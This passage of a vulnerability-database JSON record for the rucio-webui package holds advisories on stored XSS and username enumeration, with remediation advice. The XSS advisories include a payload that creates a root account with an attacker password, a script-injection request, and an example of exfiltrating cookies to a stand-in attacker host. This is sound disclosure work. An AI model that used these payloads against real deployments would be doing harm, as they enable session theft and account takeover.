Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker controlled site (i.e `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. 
Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### Resources\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25734","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25734"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"ref
erence_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-02-26T16:01:30Z/"}],"url":"https://gith
ub.com/rucio/rucio/security/advisories/GHSA-h9fp-p2p9-873q"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25734","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25734"},{"reference_url":"https://github.com/advisories/GHSA-h9fp-p2p9-873q","reference_id":"GHSA-h9fp-p2p9-873q","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-h9fp-p2p9-873q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25734","GHSA-h9fp-p2p9-873q"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-jtev-r8r4-vfd5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19724?format=json","vulnerability_id":"VCID-k519-hpbg-53h7","summary":"Rucio WebUI has Username Enumeration via Login Error Message\n### Summary\nThe WebUI login endpoint returns distinct error messages depending on whether a supplied username exists, allowing 
unauthenticated attackers to enumerate valid usernames.\n\n### Details\nWhen submitting invalid credentials to `/ui/login`, the WebUI responds with different error messages based on the existence of the provided username (identity). A non-existent username results in an error indicating that no account is associated with the identity, while an existing username with an incorrect password produces a different authentication-related error.\n\nThis behavioral difference allows an attacker to distinguish valid usernames from invalid ones by observing the response content.\n\n### Proof of Concept\n**Bogus Login (Non-existent Username \"15251087\")**  \nResponse contains:\n```\nCannot get find any account associated with 15251087 identity.\n```\n\n**Bogus Login (Existing Username \"root\", Wrong Password)**  \nResponse contains:\n```\nCannot get auth token. It is possible that the presented identity root is not mapped to any Rucio account root.\n```\n\nThe difference in error messages confirms whether a username exists.\n\n### Impact\nAn unauthenticated attacker can enumerate valid usernames, which may be leveraged for targeted password guessing, credential stuffing, or social engineering attacks.\n\n### Remediation / Mitigation\nReturn a generic authentication failure message for all login errors, regardless of whether the username exists. Avoid disclosing account or identity existence through error responses. 
Consider implementing rate limiting or additional login throttling to further reduce abuse.\n\n#### Resources:\n- OWASP Authentication Cheat Sheet - Authentication and Error Messages: https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25138","reference_id":"","reference_type":"","scores":[{"value":"0.00077","scoring_system":"epss","scoring_elements":"0.2302","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25138"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/ru
cio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-38wq-6q2w-hcf9","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-02-26T16:03:18Z/"}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-38wq-6q2w-hcf9"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25138","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25138"},{"reference_url":"https://github
.com/advisories/GHSA-38wq-6q2w-hcf9","reference_id":"GHSA-38wq-6q2w-hcf9","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-38wq-6q2w-hcf9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25138","GHSA-38wq-6q2w-hcf9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-k519-hpbg-53h7"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/19641?format=json","vulnerability_id":"VCID-uu7j-pay1-9qd1","summary":"Rucio WebUI has a Stored Cross-site Scripting (XSS) vulnerability in its Identity Name\n### Summary\nA stored Cross-site Scripting (XSS) vulnerability was identified in the Identity Name of the WebUI where attacker-controlled input is persisted by the backend and later rendered in the WebUI without proper output encoding. 
This allows arbitrary JavaScript execution in the context of the WebUI for users who view affected pages, potentially enabling session token theft or unauthorized actions.\n\n---\n### Details\nThe identity name is stored and later rendered without output encoding.\n\n**Create Path**:  \nAdmin > Account Management > _ACCOUNT NAME_ > Add Account Identity\n\n**Trigger Path**:  \nAdmin > Account Management > _ACCOUNT NAME_  \n(`https://127.0.0.1:8443/ui/account?account=pentest`)\n\n**Request**\n```http\nPOST /proxy/accounts/pentest/identities HTTP/1.1\n...\n{\"identity\":\"<script>alert(document.cookie)</script>\",\"authtype\":\"SSH\",\"email\":\"Test\"}\n```\n\n**Response**\n```http\nHTTP/1.1 201 CREATED\n...\nCreated\n```\n\n**Storing XSS payload in account identity name**\n<img width=\"1385\" height=\"807\" alt=\"Storing XSS payload in account identity name\" src=\"https://github.com/user-attachments/assets/e4209ef4-fd88-492f-9fb0-afb7d04b15ce\" />\n\n**Triggering XSS payload when viewing account**\n<img width=\"1395\" height=\"745\" alt=\"Triggering XSS payload when viewing account\" src=\"https://github.com/user-attachments/assets/e6217669-a0f7-4aba-bb05-f4fb7049611c\" />\n\n---\n### Impact\nAny authenticated user who views affected resources may execute attacker-controlled JavaScript in the WebUI origin. 
Depending on the affected feature, this may impact all users or administrative users only.\n\nThe impact is amplified by:\n- Session cookies that are accessible to JavaScript (missing HttpOnly flag).\n- API tokens exposed to the WebUI via JavaScript variables.\n\nAn attacker would likely attempt to exfiltrate the session token to an external site by setting an encoded version of the cookie as the path of a GET request to an attacker-controlled site (i.e. `GET https://attacker.example.com/rucio/{BASE64_COOKIE}`).\n\nAttackers can also perform actions as the victim like creating a new UserPass identity with an attacker-known password, creating/deleting an RSE, or exfiltrating data.\n\n**XSS Payload to Create Root UserPass**\n```html\n<img src=x onerror=(function(){o={};o.method='PUT';o.credentials='include';o.headers={'X-Rucio-Username':'attackeruser','X-Rucio-Password':'AttackerPassword123','X-Rucio-Email':'demo@example.org','X-Rucio-Auth-Token':token};fetch(String.fromCharCode(47)+'identities'+String.fromCharCode(47)+'root'+String.fromCharCode(47)+'userpass',o)})()>\n```\n\n---\n### Remediation / Mitigation\nAll client-side renderings of server-provided or user-controlled data must ensure proper HTML escaping before insertion into the DOM. Unsafe methods such as `.html()` should be avoided unless the content is explicitly sanitized. 
Safer alternatives include `.text()`, creating text nodes, or using a templating system that enforces automatic escaping.\n\nAdditional defense-in-depth measures include:\n- Enforcing a strict Content Security Policy (CSP).\n- Setting the HttpOnly flag on session cookies.\n- Avoiding exposure of API tokens in JavaScript-accessible variables.\n\n> Note that many pages were found setting the API token as `token` in an authenticated response like `var token = \"root-root-webui-...:\"` (See `/ui/list_accounts` for example)\n\n---\n### References\n- OWASP XSS Prevention Cheat Sheet: [https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25735","reference_id":"","reference_type":"","scores":[{"value":"0.00092","scoring_system":"epss","scoring_elements":"0.25931","published_at":"2026-05-29T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-25735"},{"reference_url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html"},{"reference_url":"https://github.com/rucio/rucio","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/35.8.3","reference_id":"","reference_type":"","scores":[{"value
":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/35.8.3"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/38.5.4","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/38.5.4"},{"reference_url":"https://github.com/rucio/rucio/releases/tag/39.3.1","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/releases/tag/39.3.1"},{"reference_url":"https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/rucio/rucio/security/advisories/GHSA-8wpv-6x3f-3rm5"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25735","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-25735"},{"reference_url":"https://github.com/advisories/GHSA-8wpv-6x3f-3rm5","reference_id":"GHSA-8wpv-6x3f-3rm5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1
_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8wpv-6x3f-3rm5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/55271?format=json","purl":"pkg:pypi/rucio-webui@35.8.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@35.8.3"},{"url":"http://public2.vulnerablecode.io/api/packages/55275?format=json","purl":"pkg:pypi/rucio-webui@38.5.4","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@38.5.4"},{"url":"http://public2.vulnerablecode.io/api/packages/55277?format=json","purl":"pkg:pypi/rucio-webui@39.3.1","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@39.3.1"}],"aliases":["CVE-2026-25735","GHSA-8wpv-6x3f-3rm5"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uu7j-pay1-9qd1"}],"fixing_vulnerabilities":[],"risk_score":null,"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/rucio-webui@1.25.3.post2"}